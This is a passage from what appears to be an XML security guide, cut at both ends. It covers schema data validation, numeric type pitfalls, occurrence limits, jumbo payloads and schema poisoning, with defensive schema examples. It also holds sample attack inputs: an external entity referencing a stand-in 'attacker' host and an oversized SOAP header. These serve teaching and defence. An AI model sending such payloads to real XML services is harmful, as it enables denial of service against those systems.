  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1,000,000 digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. Both &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. After these definitions begins the well-formed and valid XML document. The &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; element contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
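For comparison, the following is a minimal sketch of how the same document could be constrained with XML Schema instead of DTD. The limits used here (a &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; of at most 256 characters and an &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; between 0 and 150 written with at most three digits) are illustrative assumptions, not values taken from any specification. The &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; facet is included because integer types accept leading zeros, so a range check alone would not bound the length of the value:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:nonNegativeInteger&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;xs:pattern value=&amp;quot;[0-9]{1,3}&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:maxInclusive value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Under these assumptions, a validating parser would reject the one-million-digit &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; during validation, before the value reaches the application logic.&lt;br /&gt;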
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. As a similar example, when using XML encryption, some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value and still considered the content valid. The first portion of the data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Because the restriction was only partially enforced, the value was probably being checked by application code rather than validated against the sample schema shown above.&lt;br /&gt;
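Returning to the hexadecimal case mentioned at the start of this section, the following is a minimal sketch of using the built-in type directly instead of a restricted string. The element name &amp;lt;tt&amp;gt;digest&amp;lt;/tt&amp;gt; and the length of 32 are hypothetical. For &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt;, the &amp;lt;tt&amp;gt;length&amp;lt;/tt&amp;gt; facet counts octets, so this value would be written with 64 hexadecimal characters:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;digest&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:hexBinary'''&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:length value=&amp;quot;32&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;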
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might produce a negative total on the user’s account. To avoid that logical vulnerability, the schema should use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user-controlled values as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. XML schemas offer data types that exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If a schema uses a data type that still admits zero, a denominator of zero may trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly chosen for fields that should only ever hold real numbers, such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
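With the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type, Infinity and NaN are not valid values for the price, so a document containing them is rejected during validation and cannot trigger errors in the application. If those values are allowed, an attacker can exploit this issue.&lt;br /&gt;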
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid.&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
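&lt;br /&gt;
The same idea applies to numeric values, where the &amp;lt;tt&amp;gt;minInclusive&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxInclusive&amp;lt;/tt&amp;gt; facets bound the value itself rather than its length. The following is a sketch that assumes a hypothetical &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; element limited to values from 1 through 1000; the actual bounds should match what the application can store and process:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;quantity&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minInclusive''' value=&amp;quot;1&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxInclusive''' value=&amp;quot;1000&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;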
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
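Assertions are part of XML Schema 1.1, so a processor that only implements XML Schema 1.0 will not accept the previous definition. The following is a possible sketch of the same constraint for such processors, assuming that a union of the two built-in integer types that exclude zero is acceptable for the application:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:'''union''' memberTypes=&amp;quot;xs:negativeInteger xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;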
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Accepting an unlimited number of occurrences can have serious consequences when the application receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
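The following is a minimal sketch of the bounded alternative, showing only the &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; declaration that sits inside the &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt; sequence. The limit of 100 is a hypothetical value; the real limit should come from testing how many elements the application can process safely:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''100'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:all&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;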
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
